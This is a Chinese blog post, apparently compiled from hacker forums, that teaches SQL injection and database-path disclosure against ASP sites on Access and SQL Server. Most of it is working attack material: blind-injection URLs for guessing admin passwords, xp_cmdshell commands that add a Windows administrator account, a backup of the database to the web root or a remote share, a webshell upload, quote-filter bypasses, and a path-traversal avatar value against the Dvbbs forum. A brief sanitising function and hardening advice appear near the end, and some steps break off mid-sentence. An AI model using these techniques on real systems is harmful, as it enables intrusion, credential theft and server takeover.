Jason's Blog

一，网站方面； 1 对于SQL主入是所有采用ASP和PHP的WEB服务器一个入侵方法，关键是由于在 原代码的查询部分也就是网站提供用户输入的地方，对参数缺少过滤，以至黑客可以 构造SQL查询语句得到管理员或者系统的敏感信息，进而参透到系统里。 例子：ASP的 在www.sxj.com/sxj.asp?id=2后面加一个单引号‘，如果出现id=2'出有未闭合 的’，很明显有漏洞，没有过滤单引号，但是有的网站，不一定每台服务器的IIS都 返回具体错误提示给客户端，如果程序中加了cint(参数)之类语句的话，ＳＱＬ注入 是不会成功的，但服务器同样会报错，具体提示信息为处理 URL 时服务器上出错。 请和系统管理员联络。 其次，部分对ＳＱＬ注入有一点了解的程序员，认为只要把单引号过滤掉就安全了， 这种情况不为少数，如果你用单引号测试，是测不到注入点的 那么，什么样的测试方法才是比较准确呢？答案如下： ① http://www.sxj.com/sxj.asp?id=2 ② http://www.sxj.com/sxj.asp?id=2 and 1=1 ③ http://www.sxj.com/sxj.asp?id=2 and 1=2如果1和2返回的是正常的页面，而且3返回的是错误的页面的话，那么说明该网站 存在主入点，接下来就是具体的主入了： 首先，提交www.sxj.com/sxj.asp?id=2 and 1<>(select id from users) 判断是 否有一个叫users的用户表存在，如果存在进一步www.sxj.com/sxj.asp?id=2 and 1<>(select id from users where username>0)可以判断是否存在一个字段是user name的列，如果存在可以 www.sxj.com/sxj.asp?id=2 and 1<>(select id from users where password>0)可以判断是否一个字段是password的表列，好了，现在可以猜测 用户名和密码了，一般用户名是可以从网站得知的，所以我从密码的长度入手， www.sxj.com/sxj.asp?id=2 and 1<>(select id from users where len(password) >N（N为一个你自定义的一个数值）最好结合大于>和小于<一起集合使用提高效率 如果知道了密码长度为8位，接下来www.sxj.com/sxj.asp?id=2 and 1<>(select id from users where username='cookie' and left(password,1)='任意的字符包括数字') 一个一个的尝试，当www.sxj.com/sxj.asp?id=2 and 1<>(select id from users where username='cookie' and left(password,1)='a')页面返回正常，说明密码的 第一位是a,接下来的就不写了同理！ 最后就是登陆，如果猜测的是管理员的密码，还的找见管理员登陆的页面，然后 进入后台，找是否有上传的地方，上传WEBSHELL，提升权限，因为此时是GUEST权限 后者可以该用户注册信息为WEB木马，效果是一样的，或者改上传文件的类型， 以上的操作是网站没有禁止FSO（file system object)，其他的方法我还不知道呀 郁闷！ 判断数据库类型和数据库用户名及注入方法 不同的数据库的函数、注入方法都是有差异的，所以在注入之前，我们还要判断一下 数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer，网上超过99%的网站 都是其中之一。怎么让程序告诉你它使用的什么数据库呢？来看看： SQLServer有一些系统变量，如果服务器IIS提示没关闭，并且SQLServer返回错误提示 的话，那可以直接从出错信息获取，方法如下： http://www.19cn.com/showdetail.asp?id=49 and user>0 这句语句很简单，但却包含了SQLServer特有注入方法的精髓，我自己也是在一次无意的 测试中发现这种效率极高的猜解方法。让我看来看看它的含义：首先，前面的语句是正常 的，重点在and user>0，我们知道，user是SQLServer的一个内置变量，它的值是当前连接 的用户名，类型为nvarchar。拿一个nvarchar的值跟int的数0比较，系统会先试图将nvarch ar的值转成int型，当然，转的过程中肯定会出错，SQLServer的出错提示是：将nvarchar值 ”abc” 转换数据类型为 int 的列时发生语法错误，呵呵，abc正是变量user的值，这样， 不废吹灰之力就拿到了数据库的用户名。在以后的篇幅里，大家会看到很多用这种方法的语 句。 顺便说几句，众所周知，SQLServer的用户sa是个等同Adminstrators权限的角色，拿到了sa 权限，几乎肯定可以拿到主机的Administrator了。上面的方法可以很方便的测试出是否是用 sa登录，要注意的是：如果是sa登录，提示是将”dbo”转换成int的列发生错误，而不是”sa”。 如果服务器IIS不允许返回错误提示，那怎么判断数据库类型呢？我们可以从Access和SQLServ er和区别入手，Access和SQLServer都有自己的系统表，比如存放数据库中所有对象的表，Acce ss是在系统表[msysobjects]中，但在Web环境下读该表会提示“没有权限”，SQLServer是在表 [sysobjects]中，在Web环境下可正常读取。 在确认可以注入的情况下，使用下面的语句： http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)>0 http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)>0 如果数据库是SQLServer，那么第一个网址的页面与原页面http://www.19cn.com/showdetail.asp ?id=49是大致相同的；而第二个网址，由于找不到表msysobjects，会提示出错，就算程序有容错 处理，页面也与原页面完全不同。 如果数据库用的是Access，那么情况就有所不同，第一个网址的页面与原页面完全不同；第二个网 址，则视乎数据库设置是否允许读该系统表，一般来说是不允许的，所以与原网址也是完全不同。 大多数情况下，用第一个网址就可以得知系统所用的数据库类型，第二个网址只作为开启IIS错误提 示时的验证 另外在判断密码长度和用户名时，如果密码用户名是汉字，那么前面的left就不好用了，所以我 使用了ASC(MID(PASSWORD),1,1)来判断第二个参数是password的启始位，第三个参数是指个数一般为 1，这样得到是ASC码值最后可以对照ASC码表找出密码的值 SQL注入常用函数 有SQL语言基础的人，在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水 平，特别是一些常用的函数及命令。 Access：asc(字符) SQLServer：unicode(字符) 作用：返回某字符的ASCII码 Access：chr(数字) SQLServer：nchar(数字) 作用：与asc相反，根据ASCII码返回字符 Access：mid(字符串,N,L) SQLServer：substring(字符串,N,L) 作用：返回字符串从N个字符起长度为L的子字符串，即N到N+L之间的字符串 Access：abc(数字) SQLServer：abc (数字) 作用：返回数字的绝对值（在猜解汉字的时候会用到） Access：A between B And C SQLServer：A between B And C 作用：判断A是否界于B与C之间 第三节、中文处理方法 在注入中碰到中文字符是常有的事，有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有 所了解，“中文恐惧症”很快可以克服。 先说一点常识： Access中，中文的ASCII码可能会出现负数，取出该负数后用abs()取绝对值，汉字字符不变。 SQLServer中，中文的ASCII为正数，但由于是UNICODE的双位编码，不能用函数ascii()取得ASCII码，必 须用函数unicode ()返回unicode值，再用nchar函数取得对应的中文字符。 第二部分，利用系统表主入SQLServer数据库 SQLServer是一个功能强大的数据库系统，与操作系统也有紧密的联系，这 给开发者带来很大的方便，但另一方面，也为主入者提供一个跳板，我们先来看看 几个具体的例子： 1 http://site/usl.asp?id=1;exec master..xp_cmdshell "net user cookie pas sword /add"-- 2 http://site/usl.asp?id=1;exec master..xp_cmdshell "net localgroup adminis trators cookie /add" 分号；在SQLServer中表示阁开前后两句，--表示后面的语句为注释，所以， 这句在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储 过程xp_cmdshell,这个存储过程用于凋用系统命令，于是，用net命令新建立了 用户名为name,密码为password的windows的帐号。 3 http://site/usl.asp?id=1;;and db_name()>0 前面有个类似的例子and user>0,作用是获取连接用户名，db_name()是另一个系统 变量，返回的是连接的数据库名。 4 http://site/usl.asp?id=1;backup database 数据库名 to disk='c:\inetpub\ wwwroot\1.db';-- 这是相当狠的一招从3拿到的数据库名，加上某些IIS出错暴露出的绝对路径，将 数据库备份到WEB目录下面，再用HTTP把整个数据库就完完整整的下载回来，所有的 管理员及用户密码都一览无疑！在不知道绝对路径的时候，还可以备份到网络地址 的方法（如\\218.27.87.150\share\1.db),但成功率不高。 5 http://site/url.asp?id=1;;and (select Top 1 name from sysobjects where xtype='U' and status>o)>0 前面说过，sysobjects是SQLServer的系统表，存储着所有的, 视图，约束及其他对象，xtype='U' and status>0，表示用户建立的表名，上面的 语句将第一个表名取出，与0比较大小，让报错信息把表名暴露出来。第二，第三 个表怎么获取？ 6 http://site/url.asp?id=1;;and (select top 1 col_name(object_id('表名 ’),1) from systemobjects)>0 从5拿到的表名的第一个字段名，将1换成2，3，4...就可以逐个获取所猜测里面的字 段名。 第二节、绕过程序限制继续注入 在入门篇提到，有很多人喜欢用’号测试注入漏洞，所以也有很多人用过滤’号的方 法来“防止”注入漏洞，这也许能挡住一些入门者的攻击，但对ＳＱＬ注入比较熟悉 的人，还是可以利用相关的函数，达到绕过程序限制的目的。 在“ＳＱＬ注入的一般步骤”一节中，我所用的语句，都是经过我优化，让其不包含 有单引号的；在“利用系统表注入SQLServer数据库”中，有些语句包含有’号，我们 举个例子来看看怎么改造这些语句： 简单的如where xtype=’U’，字符U对应的ASCII码是85，所以可以用where xtype= char(85)代替；如果字符是中文的，比如where name=’用户’，可以用where name= nchar(29992)+nchar(25143)代替。 防 范 方 法 ＳＱＬ注入漏洞可谓是“千里之堤，溃于蚁穴”，这种漏洞在网上极为普遍，通常是由 于程序员对注入不了解，或者程序过滤不严格，或者某个参数忘记检查导致。在这里， 我给大家一个函数，代替ASP中的Request函数，可以对一切的SQL注入Say NO，函数如下： Function SafeRequest(ParaName,ParaType) '--- 传入参数 --- 'ParaName:参数名称-字符型 'ParaType:参数类型-数字型(1表示以上参数是数字，0表示以上参数为字符) Dim ParaValue ParaValue=Request(ParaName) If ParaType=1 then If not isNumeric(ParaValue) then Response.write "参数" & ParaName & "必须为数字型！" Response.end End if Else ParaValue=replace(ParaValue,"'","''") End if SafeRequest=ParaValue End function 2 暴网站数据库的方法 1 动力文章系统 1）漏洞介绍：由于数据库连接文件INC/conn.asp和数据库文件database/123.mdb都放 在同级目录ACCESS下 而且他们都用的是相对路径，用网站自带的编辑页

提交后数据库的路径就会出来了：] Microsoft JET Database Engine 错误 '80004005' 'E:\My\ACCESS\inc\database\adsfkldfogowerjnokfdslwejhdfsjhk.mdb'不是一个有效的路径 。 确定路径名称 拼写是否正确，以及是否连接到文件存放的服务器。 /inc/conn.asp，行9 文章引用了http://www.hackerxfiles.net/bbs/dispbbs.asp?boardID=4& ID=27293 http://www.xfocus.net/articles/200402/662.html 2 动网论坛 2）漏洞介绍：方法是源于动力文章系统暴库，因为动网论坛的conn.asp文件和数据库的文件 夹在同一个目录 下，所以如果把conn.asp文件转移到调用他的文件的上级目录，而且是相对路径就可以暴库] 所以想到了前段时间发现的动网论坛可以转移文件的漏洞，漏洞的内容是，在用户修改资料里的 ，他对用户自定义 头像地址过滤不严，导致用户通过构造跳转路径，使conn.asp文件转移到上级目录， 漏洞源代码： '****************** '对上传头象进行过滤与改名 if Cint(Forum_Setting(7))=1 then on error resume next dim objFSO,upfilename,newfilename dim upface,memberid set rs=conn.execute("select userid,face from [user] where userid="&userid) memberid=rs(0) upface=trim(rs(1)) newfilename="" upfilename=split(upface,"/") if ubound(upfilename)=1 and upfilename(0)="uploadFace" then if instr(upfilename(1),"_")=0 then newfilename="uploadFace/"&memberid&"_"&upfilename(1) /用户定义的头像 变为uploadFace/用户ID Set objFSO = Server.CreateObject("Scripting.FileSystemObject") if objFSO.fileExists(Server.MapPath(upface)) then objFSO.movefile ""&Server.MapPath(upface)&"",""&Server.MapPath(newfilename)&"" end if If Err.Number = 0 Then conn.execute("update [user] set face='"&newfilename&"' where userid="&userid) end if set objFSO=nothing end if end if rs.close set rs=nothing end if '对上传头象进行过滤与改名结束 '**************** 　　看看这句： newfilename="uploadFace/"&memberid&"_"&upfilename(1) /newfilename=用户定义的 头像变为uploadFace/用户ID_upfilen ame的另一部分 再看： if objFSO.fileExists(Server.MapPath(upface)) then objFSO.movefile ""&Server.MapPath(upface)&"",""&Server.MapPath(newfilename)&"" /看见没有？最关键的部分来了，如果检测到upface代表的文件存在，则对改文件进行移动并改名！ 相信大家都在那里把/、\、.和..的作用了解了吧。呵呵，下面我们要做的就是跳转目录把conn.asp 转移过来。在自定义头像地址那里添上这样的一句： uploadFace/.\..\conn.asp （注意大小写） 　　前面已经分析过代码了，这句话的意思应该看的懂了吧，我们把“头像”地址指向了上级目录的 conn.asp。由于符合它的判断条件upface存在，所以它就会把conn.asp这个文件转移到uploadFace这 个目录来，这样就符合我们玩动力文章系统的时候的第一个条件了。一般大家用的都是相对路径，所 以下面我们只要调用这个文件就会知道数据库路径。新建一个HTML文件写上如下内容： 安全篇 　　看来问题都出在conn.asp本身，不打自招。为了安全我们得好好处理一下它。 　　最笨的方法就是把它改名了，让别人猜不到路径。但是它要被很多文件调用，还得改其它地方。 　　我们用相对路径的时候，数据库路径会随着调用conn.asp的文件而改变，从而产生了错误。那么我 们就让连接数据库使用绝对路径，这样一来不管谁调用conn.asp数据库路径都不变了。 　　我在测试动网这个漏洞的时候，发现对一些比较新的版本，就是文件挪移成功了也暴不出数据库路 径。但是有的6.0版本有效。看来新的版本动网论坛对conn.asp进行了特殊的处理。对比了一下两个不同 的conn.asp，发现新的conn.asp里加了这么一句： On Error Resume Next 　　这样一来，就是出错了不提示数据库信息，打死了也不招！当然以上的那些方法结合起来使用就更好了 3 利用IE漏洞暴库，一般的网站路径是http://www.sxj.com/sxj.asp 是/，我们知道/ 和\其实是一样的都能对路径起跳转作用，但是\的UNICODE是%5c当提交时，IE无法正常解析 导致暴库，但是一般的错误返回页面是本地IE提供的，所以我门先的关了本地的错误页面，具体在菜单项的‘ 工具->internet选项->高级->显示HTTP友好页面（把前面的对号去掉）

Tags:

发布:straydog | 分类:电脑常识 | 评论:0 | 引用:0 | 浏览:

发表评论:

名称(*)

邮箱

网站链接

验证(*)

正文(*)(留言最长字数:1000)

记住我,下次回复时不用重新输入个人信息

◎欢迎参与讨论，请在这里发表您的看法、交流您的观点。

Powered By Z-Blog 1.8 Arwen Build 81206

本博客部分内容来自于网络，如有侵犯到您的版权，请立刻通知我删除。 不要迷恋哥，哥并不是什么首席设计师或资深设计师，哥只是普普通通的网页设计师。
Copyright 2006-2010 www.web78.cn 靖观天下, All Rights Reserved.

回顶部